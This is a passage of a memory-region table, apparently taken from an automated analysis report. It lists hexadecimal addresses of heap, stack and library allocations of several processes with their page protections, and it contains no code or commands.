page read and write
|
||
2DB307C0000
|
heap
|
page read and write
|
||
18C003D0000
|
trusted library allocation
|
page read and write
|
||
FE1AA7F000
|
stack
|
page read and write
|
||
18C00011000
|
trusted library allocation
|
page read and write
|
||
2DB32570000
|
heap
|
page readonly
|
||
139D8A5D000
|
heap
|
page read and write
|
||
245935FC000
|
heap
|
page read and write
|
||
210561BE000
|
heap
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
2DB327D2000
|
trusted library allocation
|
page read and write
|
||
2178E4D0000
|
trusted library allocation
|
page read and write
|
||
2459172F000
|
heap
|
page read and write
|
||
7FF83B9B0000
|
trusted library allocation
|
page read and write
|
||
1ECEE5F3000
|
heap
|
page read and write
|
||
7FF83B860000
|
trusted library allocation
|
page execute and read and write
|
||
139D8A88000
|
heap
|
page read and write
|
||
7FF83B840000
|
trusted library allocation
|
page read and write
|
||
2080FB0B000
|
heap
|
page read and write
|
||
204E7478000
|
heap
|
page read and write
|
||
1C4D0466000
|
heap
|
page read and write
|
||
1C4D07C5000
|
heap
|
page read and write
|
||
204E7C92000
|
heap
|
page read and write
|
||
24593D13000
|
heap
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
2546BB81000
|
heap
|
page read and write
|
||
174ECD50000
|
heap
|
page execute and read and write
|
||
955B8FB000
|
stack
|
page read and write
|
||
1ECD6573000
|
trusted library allocation
|
page read and write
|
||
139D8A3E000
|
heap
|
page read and write
|
||
1C4D0469000
|
heap
|
page read and write
|
||
1A7C6C3F000
|
heap
|
page read and write
|
||
2178CB86000
|
heap
|
page read and write
|
||
2178CBC4000
|
heap
|
page read and write
|
||
1AA51DF6000
|
trusted library allocation
|
page read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
7FF83B941000
|
trusted library allocation
|
page read and write
|
||
1BA5AEA7000
|
trusted library allocation
|
page read and write
|
||
1AA4F87F000
|
heap
|
page read and write
|
||
5668288000
|
stack
|
page read and write
|
||
955AFDE000
|
stack
|
page read and write
|
||
24593612000
|
heap
|
page read and write
|
||
24593D3B000
|
heap
|
page read and write
|
||
1C4D0014000
|
heap
|
page read and write
|
||
24593A8D000
|
heap
|
page read and write
|
||
2DB4A8C3000
|
heap
|
page read and write
|
||
24593A6B000
|
heap
|
page read and write
|
||
883D30E000
|
stack
|
page read and write
|
||
2103BD19000
|
heap
|
page read and write
|
||
1BA5AA92000
|
trusted library allocation
|
page read and write
|
||
1A7C67D4000
|
heap
|
page read and write
|
||
1A7C6B98000
|
heap
|
page read and write
|
||
B9A6179000
|
stack
|
page read and write
|
||
1AA518BC000
|
trusted library allocation
|
page read and write
|
||
24591788000
|
heap
|
page read and write
|
||
239240F0000
|
heap
|
page execute and read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
1C4D07C4000
|
heap
|
page read and write
|
||
1A7C67FB000
|
heap
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
24593A45000
|
heap
|
page read and write
|
||
204E7470000
|
heap
|
page read and write
|
||
1A7C6825000
|
heap
|
page read and write
|
||
7FF83B942000
|
trusted library allocation
|
page read and write
|
||
1C4CE17E000
|
heap
|
page read and write
|
||
1A7C4937000
|
heap
|
page read and write
|
||
174D2E59000
|
heap
|
page read and write
|
||
1BA58C90000
|
heap
|
page read and write
|
||
139D8A86000
|
heap
|
page read and write
|
||
2DB4A970000
|
heap
|
page read and write
|
||
7FF83B876000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BB00000
|
trusted library allocation
|
page read and write
|
||
1C4D000C000
|
heap
|
page read and write
|
||
1A7C6810000
|
heap
|
page read and write
|
||
7FF83B9A0000
|
trusted library allocation
|
page read and write
|
||
204E7483000
|
heap
|
page read and write
|
||
24593AA5000
|
heap
|
page read and write
|
||
1C4D0400000
|
heap
|
page read and write
|
||
1EF4FF36000
|
heap
|
page read and write
|
||
1004FE000
|
stack
|
page read and write
|
||
217A6AE8000
|
heap
|
page read and write
|
||
1A8DDB39000
|
heap
|
page read and write
|
||
1AA69B10000
|
heap
|
page read and write
|
||
2178CC80000
|
heap
|
page read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
1A8DDB78000
|
heap
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
18C00040000
|
trusted library allocation
|
page read and write
|
||
24593AA5000
|
heap
|
page read and write
|
||
7FF83B84C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
189FBFE2000
|
heap
|
page read and write
|
||
1EF51CFB000
|
trusted library allocation
|
page read and write
|
||
174D4C19000
|
trusted library allocation
|
page read and write
|
||
1A7C6A66000
|
heap
|
page read and write
|
||
7FF83B8C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83B7D4000
|
trusted library allocation
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page execute and read and write
|
||
174D4B2B000
|
trusted library allocation
|
page read and write
|
||
204E745B000
|
heap
|
page read and write
|
||
1AA51460000
|
heap
|
page read and write
|
||
1C4D003C000
|
heap
|
page read and write
|
||
21055DC0000
|
heap
|
page execute and read and write
|
||
24593D65000
|
heap
|
page read and write
|
||
18C6FCFE000
|
heap
|
page read and write
|
||
BF5393F000
|
stack
|
page read and write
|
||
2DB327ED000
|
trusted library allocation
|
page read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
189FE057000
|
heap
|
page read and write
|
||
1C4D0009000
|
heap
|
page read and write
|
||
7FF83BAD3000
|
trusted library allocation
|
page read and write
|
||
BF537FE000
|
stack
|
page read and write
|
||
204E7480000
|
heap
|
page read and write
|
||
1C4CFFF5000
|
heap
|
page read and write
|
||
2103DAA0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
1EF534FD000
|
trusted library allocation
|
page read and write
|
||
1EF4FF84000
|
heap
|
page read and write
|
||
24593681000
|
heap
|
page read and write
|
||
539A07B000
|
stack
|
page read and write
|
||
2390C058000
|
trusted library allocation
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
2080DDF0000
|
heap
|
page read and write
|
||
5399F7E000
|
stack
|
page read and write
|
||
1FBCD77E000
|
trusted library allocation
|
page read and write
|
||
7FF7A18DA000
|
unkown
|
page readonly
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
1A7C6800000
|
heap
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
1C4D0857000
|
heap
|
page read and write
|
||
1EF4FED0000
|
heap
|
page readonly
|
||
2103DAA3000
|
trusted library allocation
|
page read and write
|
||
24593AA8000
|
heap
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
24593D48000
|
heap
|
page read and write
|
||
1C4CFFD0000
|
heap
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page execute and read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
7FF83B881000
|
trusted library allocation
|
page execute and read and write
|
||
FE1B03E000
|
stack
|
page read and write
|
||
24593AA8000
|
heap
|
page read and write
|
||
1EF51B30000
|
heap
|
page execute and read and write
|
||
2103BEA0000
|
heap
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
BF53B3E000
|
stack
|
page read and write
|
||
24593AA8000
|
heap
|
page read and write
|
||
1C4D02B5000
|
heap
|
page read and write
|
||
20811384000
|
trusted library allocation
|
page read and write
|
||
139D8AB2000
|
heap
|
page read and write
|
||
245935EF000
|
heap
|
page read and write
|
||
24593D1E000
|
heap
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
24593A47000
|
heap
|
page read and write
|
||
7FF83B950000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83B7A4000
|
trusted library allocation
|
page read and write
|
||
1A8DFA11000
|
trusted library allocation
|
page read and write
|
||
1A7C6C6E000
|
heap
|
page read and write
|
||
85F3E7E000
|
stack
|
page read and write
|
||
1C4D003C000
|
heap
|
page read and write
|
||
1FBCD7DC000
|
trusted library allocation
|
page read and write
|
||
24593A86000
|
heap
|
page read and write
|
||
7FF83B7AB000
|
trusted library allocation
|
page read and write
|
||
174D4B9A000
|
trusted library allocation
|
page read and write
|
||
7FF83B7CD000
|
trusted library allocation
|
page execute and read and write
|
||
1C4CE185000
|
heap
|
page read and write
|
||
189804F8000
|
trusted library allocation
|
page read and write
|
||
2390BFCD000
|
trusted library allocation
|
page read and write
|
||
2178CC31000
|
heap
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
56176BE000
|
stack
|
page read and write
|
||
2546B749000
|
heap
|
page read and write
|
||
204E7488000
|
heap
|
page read and write
|
||
1A8DFC3D000
|
trusted library allocation
|
page read and write
|
||
1C4CE1B2000
|
heap
|
page read and write
|
||
56673FF000
|
stack
|
page read and write
|
||
7FF83BB40000
|
trusted library allocation
|
page execute and read and write
|
||
1A8EFA11000
|
trusted library allocation
|
page read and write
|
||
7FF83B98A000
|
trusted library allocation
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
2546B761000
|
heap
|
page read and write
|
||
204E74C5000
|
heap
|
page read and write
|
||
1ECD6576000
|
trusted library allocation
|
page read and write
|
||
85F40FE000
|
stack
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
1A7C67F8000
|
heap
|
page read and write
|
||
1ECD68E7000
|
trusted library allocation
|
page read and write
|
||
1C4CE1E2000
|
heap
|
page read and write
|
||
18980532000
|
trusted library allocation
|
page read and write
|
||
85F3EFF000
|
stack
|
page read and write
|
||
1BA5AAC5000
|
trusted library allocation
|
page read and write
|
||
1C4D001C000
|
heap
|
page read and write
|
||
2103F7F1000
|
trusted library allocation
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page execute and read and write
|
||
245916F9000
|
heap
|
page read and write
|
||
1A7C6C23000
|
heap
|
page read and write
|
||
1C4D0035000
|
heap
|
page read and write
|
||
245935CD000
|
heap
|
page read and write
|
||
24593A6B000
|
heap
|
page read and write
|
||
1EF4FEE0000
|
trusted library allocation
|
page read and write
|
||
18C005CB000
|
trusted library allocation
|
page read and write
|
||
24593D4F000
|
heap
|
page read and write
|
||
1C4CE1BE000
|
heap
|
page read and write
|
||
1C4D003D000
|
heap
|
page read and write
|
||
1BA72ECD000
|
heap
|
page read and write
|
||
2DB3080C000
|
heap
|
page read and write
|
||
1C4CE171000
|
heap
|
page read and write
|
||
204E7CAD000
|
heap
|
page read and write
|
||
2103BCD0000
|
heap
|
page read and write
|
||
245935D4000
|
heap
|
page read and write
|
||
2DB4A83A000
|
heap
|
page read and write
|
||
1FBCB5A0000
|
heap
|
page readonly
|
||
1C4D0058000
|
heap
|
page read and write
|
||
1C4D003C000
|
heap
|
page read and write
|
||
174D2E64000
|
heap
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
245935ED000
|
heap
|
page read and write
|
||
18C6FD0A000
|
heap
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
217A6DB0000
|
heap
|
page read and write
|
||
24593A74000
|
heap
|
page read and write
|
||
1EF69E55000
|
heap
|
page read and write
|
||
1C4D0483000
|
heap
|
page read and write
|
||
1C4D07EB000
|
heap
|
page read and write
|
||
1A8EFCFF000
|
trusted library allocation
|
page read and write
|
||
FE1B1BC000
|
stack
|
page read and write
|
||
21055CF1000
|
heap
|
page read and write
|
||
204E7FA3000
|
heap
|
page read and write
|
||
254698C0000
|
heap
|
page read and write
|
||
56174BF000
|
stack
|
page read and write
|
||
85F437E000
|
stack
|
page read and write
|
||
1AA4FA80000
|
heap
|
page readonly
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
245935D9000
|
heap
|
page read and write
|
||
2103F1DE000
|
trusted library allocation
|
page read and write
|
||
1BA6AA81000
|
trusted library allocation
|
page read and write
|
||
1A7C6817000
|
heap
|
page read and write
|
||
1EF4FDF7000
|
heap
|
page read and write
|
||
2179EC8B000
|
trusted library allocation
|
page read and write
|
||
1A7C48D0000
|
heap
|
page read and write
|
||
21790065000
|
trusted library allocation
|
page read and write
|
||
561753C000
|
stack
|
page read and write
|
||
2459377B000
|
heap
|
page read and write
|
||
2390B9F0000
|
heap
|
page execute and read and write
|
||
2459179D000
|
heap
|
page read and write
|
||
2459361B000
|
heap
|
page read and write
|
||
1AA5184C000
|
trusted library allocation
|
page read and write
|
||
174D4ED4000
|
trusted library allocation
|
page read and write
|
||
2103F292000
|
trusted library allocation
|
page read and write
|
||
7FF83B980000
|
trusted library allocation
|
page execute and read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
1C4D0290000
|
heap
|
page read and write
|
||
7FF83B7DD000
|
trusted library allocation
|
page execute and read and write
|
||
245919CA000
|
heap
|
page read and write
|
||
2390A110000
|
heap
|
page read and write
|
||
1C4D04CC000
|
heap
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
2080F7A0000
|
trusted library allocation
|
page read and write
|
||
2103DBA0000
|
heap
|
page execute and read and write
|
||
1ECD69DA000
|
trusted library allocation
|
page read and write
|
||
245935C5000
|
heap
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
24593D12000
|
heap
|
page read and write
|
||
174D2EB0000
|
heap
|
page read and write
|
||
7FF83B9B2000
|
trusted library allocation
|
page read and write
|
||
1C4CE1EC000
|
heap
|
page read and write
|
||
7FF83B981000
|
trusted library allocation
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
174D4EFE000
|
trusted library allocation
|
page read and write
|
||
2390C5BF000
|
trusted library allocation
|
page read and write
|
||
1EF4FD79000
|
heap
|
page read and write
|
||
7FF83BB10000
|
trusted library allocation
|
page read and write
|
||
1EF4FF30000
|
heap
|
page read and write
|
||
1A7C67E8000
|
heap
|
page read and write
|
||
217A6AC1000
|
heap
|
page read and write
|
||
1C4D07FA000
|
heap
|
page read and write
|
||
1C4D0040000
|
heap
|
page read and write
|
||
1BA5ABCD000
|
trusted library allocation
|
page read and write
|
||
1C4D004A000
|
heap
|
page read and write
|
||
1A7C6829000
|
heap
|
page read and write
|
||
23924390000
|
heap
|
page read and write
|
||
139D8A10000
|
heap
|
page read and write
|
||
2546B78D000
|
heap
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
139D8C00000
|
heap
|
page read and write
|
||
2104DD6D000
|
trusted library allocation
|
page read and write
|
||
91B1437000
|
stack
|
page read and write
|
||
561737E000
|
stack
|
page read and write
|
||
1A7C6BE1000
|
heap
|
page read and write
|
||
5399CF9000
|
stack
|
page read and write
|
||
1C4D02B2000
|
heap
|
page read and write
|
||
1EF4FF34000
|
heap
|
page read and write
|
||
245916FE000
|
heap
|
page read and write
|
||
24593A45000
|
heap
|
page read and write
|
||
1BA5AABE000
|
trusted library allocation
|
page read and write
|
||
1C4CE1B0000
|
heap
|
page read and write
|
||
2103D6F0000
|
heap
|
page readonly
|
||
18C000FF000
|
trusted library allocation
|
page read and write
|
||
20827D7B000
|
heap
|
page read and write
|
||
21055D05000
|
heap
|
page read and write
|
||
7FF83B7DD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
24593A83000
|
heap
|
page read and write
|
||
1C4CFFF1000
|
heap
|
page read and write
|
||
2546B782000
|
heap
|
page read and write
|
||
1A7C48A0000
|
heap
|
page read and write
|
||
1A8DDB30000
|
heap
|
page read and write
|
||
21790073000
|
trusted library allocation
|
page read and write
|
||
1C4CE1AE000
|
heap
|
page read and write
|
||
18C71CA2000
|
heap
|
page read and write
|
||
1C4D003C000
|
heap
|
page read and write
|
||
18C71BE0000
|
heap
|
page read and write
|
||
1898015B000
|
trusted library allocation
|
page read and write
|
||
1A7C67E3000
|
heap
|
page read and write
|
||
2459173A000
|
heap
|
page read and write
|
||
18C6FC60000
|
heap
|
page read and write
|
||
20827E20000
|
heap
|
page execute and read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
883D38E000
|
stack
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
BF5470E000
|
stack
|
page read and write
|
||
7FF83BA91000
|
trusted library allocation
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
1C4CE16B000
|
heap
|
page read and write
|
||
1C4CE130000
|
heap
|
page read and write
|
||
24593AA8000
|
heap
|
page read and write
|
||
204E7C59000
|
heap
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
7FF83B960000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
1C4CE21B000
|
heap
|
page read and write
|
||
1A8F7B5E000
|
heap
|
page read and write
|
||
2546B774000
|
heap
|
page read and write
|
||
7FF83B7D0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
1A7C6837000
|
heap
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
883C2FF000
|
stack
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
139D8A3E000
|
heap
|
page read and write
|
||
7FF83B97A000
|
trusted library allocation
|
page read and write
|
||
91B12FE000
|
stack
|
page read and write
|
||
24593A14000
|
heap
|
page read and write
|
||
1C4CE19D000
|
heap
|
page read and write
|
||
2080DE30000
|
trusted library allocation
|
page read and write
|
||
1A7C6A63000
|
heap
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
174D2FD0000
|
heap
|
page execute and read and write
|
||
1C4D07DB000
|
heap
|
page read and write
|
||
24591788000
|
heap
|
page read and write
|
||
24593A94000
|
heap
|
page read and write
|
||
7FF83B7A3000
|
trusted library allocation
|
page execute and read and write
|
||
1A8F7BB6000
|
heap
|
page read and write
|
||
1C4D04C6000
|
heap
|
page read and write
|
||
24593A8C000
|
heap
|
page read and write
|
||
2546B798000
|
heap
|
page read and write
|
||
2546B779000
|
heap
|
page read and write
|
||
1C4D04EC000
|
heap
|
page read and write
|
||
23923FE0000
|
heap
|
page read and write
|
||
57694FC000
|
stack
|
page read and write
|
||
1ECEE540000
|
heap
|
page read and write
|
||
7FF83B870000
|
trusted library allocation
|
page read and write
|
||
1BA5AB16000
|
trusted library allocation
|
page read and write
|
||
2DB4A800000
|
heap
|
page read and write
|
||
7FF83B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
1C4D0867000
|
heap
|
page read and write
|
||
2DB327FA000
|
trusted library allocation
|
page read and write
|
||
7FF83B9A0000
|
trusted library allocation
|
page read and write
|
||
7FF83B79D000
|
trusted library allocation
|
page execute and read and write
|
||
539AACE000
|
stack
|
page read and write
|
||
7FF83B8E0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
204E7F76000
|
heap
|
page read and write
|
||
204E7CA3000
|
heap
|
page read and write
|
||
1ECD45C0000
|
heap
|
page read and write
|
||
7FF83B850000
|
trusted library allocation
|
page execute and read and write
|
||
1ECEE581000
|
heap
|
page read and write
|
||
1FBCB39B000
|
heap
|
page read and write
|
||
5768BA5000
|
stack
|
page read and write
|
||
1EF69EA0000
|
heap
|
page read and write
|
||
208108E3000
|
trusted library allocation
|
page read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
245935EF000
|
heap
|
page read and write
|
||
1AA69A70000
|
heap
|
page execute and read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
2080DE7E000
|
heap
|
page read and write
|
||
7FF83B97A000
|
trusted library allocation
|
page read and write
|
||
1C4D04D5000
|
heap
|
page read and write
|
||
1A8F7C40000
|
heap
|
page read and write
|
||
2103D6E0000
|
trusted library allocation
|
page read and write
|
||
245935C0000
|
heap
|
page read and write
|
||
1AA51CA9000
|
trusted library allocation
|
page read and write
|
||
1C4D07DD000
|
heap
|
page read and write
|
||
1FBCB350000
|
heap
|
page read and write
|
||
2104DC2A000
|
trusted library allocation
|
page read and write
|
||
245917A3000
|
heap
|
page read and write
|
||
1A8F7BED000
|
heap
|
page read and write
|
||
1A8DDC50000
|
trusted library allocation
|
page read and write
|
||
1C4CE4ED000
|
heap
|
page read and write
|
||
204E7C71000
|
heap
|
page read and write
|
||
1EF5331F000
|
trusted library allocation
|
page read and write
|
||
1C4D07CD000
|
heap
|
page read and write
|
||
189FC026000
|
heap
|
page read and write
|
||
18980573000
|
trusted library allocation
|
page read and write
|
||
7FF83B97A000
|
trusted library allocation
|
page read and write
|
||
7FF83B7F0000
|
trusted library allocation
|
page read and write
|
||
2390BF95000
|
trusted library allocation
|
page read and write
|
||
174ECDCC000
|
heap
|
page read and write
|
||
1C4D04B4000
|
heap
|
page read and write
|
||
18980153000
|
trusted library allocation
|
page read and write
|
||
2103C080000
|
heap
|
page read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
1C4D0484000
|
heap
|
page read and write
|
||
7FF83B932000
|
trusted library allocation
|
page read and write
|
||
7FF83BB10000
|
trusted library allocation
|
page read and write
|
||
1C4D04D1000
|
heap
|
page read and write
|
||
1C4CE4E5000
|
heap
|
page read and write
|
||
1C4CFFF4000
|
heap
|
page read and write
|
||
64F58FF000
|
stack
|
page read and write
|
||
1BA5B0C2000
|
trusted library allocation
|
page read and write
|
||
174ECFB0000
|
heap
|
page read and write
|
||
2459363F000
|
heap
|
page read and write
|
||
1BA72D2B000
|
heap
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
7FF83B794000
|
trusted library allocation
|
page read and write
|
||
21055D79000
|
heap
|
page read and write
|
||
24593629000
|
heap
|
page read and write
|
||
1BA5A730000
|
heap
|
page read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
2103C084000
|
heap
|
page read and write
|
||
561717F000
|
stack
|
page read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
1BA5AB85000
|
trusted library allocation
|
page read and write
|
||
1C4CFFDD000
|
heap
|
page read and write
|
||
1EF6A015000
|
heap
|
page read and write
|
||
204E7CA7000
|
heap
|
page read and write
|
||
2103BD0F000
|
heap
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
1BA5AE7D000
|
trusted library allocation
|
page read and write
|
||
2390BA80000
|
heap
|
page read and write
|
||
2103DA50000
|
trusted library allocation
|
page read and write
|
||
24591732000
|
heap
|
page read and write
|
||
7FF83B8B6000
|
trusted library allocation
|
page execute and read and write
|
||
1C4D0110000
|
heap
|
page read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
1AA51410000
|
heap
|
page execute and read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
2178EA1E000
|
trusted library allocation
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
2459176C000
|
heap
|
page read and write
|
||
2178FFCD000
|
trusted library allocation
|
page read and write
|
||
1AA517B1000
|
trusted library allocation
|
page read and write
|
||
1A8DFA00000
|
heap
|
page execute and read and write
|
||
217A6BAC000
|
heap
|
page read and write
|
||
217A6B5A000
|
heap
|
page read and write
|
||
1A7C49DF000
|
heap
|
page read and write
|
||
2178CC60000
|
heap
|
page read and write
|
||
245935F9000
|
heap
|
page read and write
|
||
1C4D002C000
|
heap
|
page read and write
|
||
139D8C20000
|
heap
|
page read and write
|
||
1C4CE1C0000
|
heap
|
page read and write
|
||
18C6FC80000
|
heap
|
page read and write
|
||
2546BA20000
|
heap
|
page read and write
|
||
21055CC0000
|
heap
|
page read and write
|
||
1ECD4411000
|
heap
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
204E7484000
|
heap
|
page read and write
|
||
2546BC39000
|
heap
|
page read and write
|
||
1C4CE1EC000
|
heap
|
page read and write
|
||
1A7C6C1D000
|
heap
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
208281C2000
|
heap
|
page read and write
|
||
2DB30853000
|
heap
|
page read and write
|
||
7FF83B84C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83B971000
|
trusted library allocation
|
page read and write
|
||
9FC3C78000
|
stack
|
page read and write
|
||
2081FCB1000
|
trusted library allocation
|
page read and write
|
||
1EF4FE70000
|
heap
|
page read and write
|
||
2459176C000
|
heap
|
page read and write
|
||
1BA73150000
|
heap
|
page read and write
|
||
7FF83B880000
|
trusted library allocation
|
page read and write
|
||
18990001000
|
trusted library allocation
|
page read and write
|
||
2546BB30000
|
remote allocation
|
page read and write
|
||
2DB3274D000
|
trusted library allocation
|
page read and write
|
||
1A7C6C23000
|
heap
|
page read and write
|
||
1A7C6A50000
|
heap
|
page read and write
|
||
883BFDF000
|
stack
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
1C4D0481000
|
heap
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
1A7C680B000
|
heap
|
page read and write
|
||
245917A3000
|
heap
|
page read and write
|
||
189FBFAA000
|
heap
|
page read and write
|
||
24593605000
|
heap
|
page read and write
|
||
7FF83B7FC000
|
trusted library allocation
|
page execute and read and write
|
||
2546BA30000
|
heap
|
page read and write
|
||
53997CE000
|
stack
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
1BA6AA91000
|
trusted library allocation
|
page read and write
|
||
1A7C49D0000
|
heap
|
page read and write
|
||
1A7C4908000
|
heap
|
page read and write
|
||
1A7C67DD000
|
heap
|
page read and write
|
||
1C4D07D7000
|
heap
|
page read and write
|
||
7FF83BA8A000
|
trusted library allocation
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
1C4D04EE000
|
heap
|
page read and write
|
||
2DB309C0000
|
heap
|
page read and write
|
||
7FF83B886000
|
trusted library allocation
|
page read and write
|
||
1FBCB520000
|
heap
|
page read and write
|
||
1C4CE1A7000
|
heap
|
page read and write
|
||
1AA4FA70000
|
heap
|
page read and write
|
||
1BA5AACA000
|
trusted library allocation
|
page read and write
|
||
98D60F5000
|
stack
|
page read and write
|
||
91B17BB000
|
stack
|
page read and write
|
||
7FF83B7E0000
|
trusted library allocation
|
page read and write
|
||
2390C430000
|
trusted library allocation
|
page read and write
|
||
1BA58DAB000
|
heap
|
page read and write
|
||
174ECD80000
|
heap
|
page read and write
|
||
91B117C000
|
stack
|
page read and write
|
||
1FBCB356000
|
heap
|
page read and write
|
||
2546BB60000
|
heap
|
page read and write
|
||
7FF83B980000
|
trusted library allocation
|
page execute and read and write
|
||
245935D2000
|
heap
|
page read and write
|
||
2081FCC1000
|
trusted library allocation
|
page read and write
|
||
1A7C6805000
|
heap
|
page read and write
|
||
174ECFD8000
|
heap
|
page read and write
|
||
174D2E50000
|
heap
|
page read and write
|
||
1BA58D4B000
|
heap
|
page read and write
|
||
24593648000
|
heap
|
page read and write
|
||
1C4CFFE4000
|
heap
|
page read and write
|
||
2459172F000
|
heap
|
page read and write
|
||
189FBF50000
|
heap
|
page read and write
|
||
24591747000
|
heap
|
page read and write
|
||
91B11FE000
|
stack
|
page read and write
|
||
1C4D002C000
|
heap
|
page read and write
|
||
2546B798000
|
heap
|
page read and write
|
||
204E7463000
|
heap
|
page read and write
|
||
245916F8000
|
heap
|
page read and write
|
||
2546BC2A000
|
heap
|
page read and write
|
||
139D8A4F000
|
heap
|
page read and write
|
||
1C4D0445000
|
heap
|
page read and write
|
||
1ECD64AB000
|
trusted library allocation
|
page read and write
|
||
7FF83B793000
|
trusted library allocation
|
page execute and read and write
|
||
1BA58D06000
|
heap
|
page read and write
|
||
7FF83B880000
|
trusted library allocation
|
page execute and read and write
|
||
2392405A000
|
heap
|
page read and write
|
||
2546BC42000
|
heap
|
page read and write
|
||
174D4C1F000
|
trusted library allocation
|
page read and write
|
||
7FF83B87C000
|
trusted library allocation
|
page execute and read and write
|
||
204E74C3000
|
heap
|
page read and write
|
||
7FF83B7D0000
|
trusted library allocation
|
page read and write
|
||
1A8F7B5C000
|
heap
|
page read and write
|
||
1AA4F7C0000
|
heap
|
page read and write
|
||
139D8A86000
|
heap
|
page read and write
|
||
64F59FC000
|
stack
|
page read and write
|
||
1ECEE530000
|
heap
|
page execute and read and write
|
||
2459172F000
|
heap
|
page read and write
|
||
239240F6000
|
heap
|
page execute and read and write
|
||
2103E7DE000
|
trusted library allocation
|
page read and write
|
||
174ECFD1000
|
heap
|
page read and write
|
||
18C71C56000
|
heap
|
page read and write
|
||
1898005E000
|
trusted library allocation
|
page read and write
|
||
2DB30A20000
|
heap
|
page read and write
|
||
2546B730000
|
heap
|
page read and write
|
||
2081199B000
|
trusted library allocation
|
page read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
204E7F71000
|
heap
|
page read and write
|
||
20827F50000
|
heap
|
page execute and read and write
|
||
7FF83B84C000
|
trusted library allocation
|
page execute and read and write
|
||
1C4CE1AC000
|
heap
|
page read and write
|
||
1C4D0482000
|
heap
|
page read and write
|
||
1A7C6A56000
|
heap
|
page read and write
|
||
1FBCD3DA000
|
trusted library allocation
|
page read and write
|
||
7FF83B7C4000
|
trusted library allocation
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
139D8A88000
|
heap
|
page read and write
|
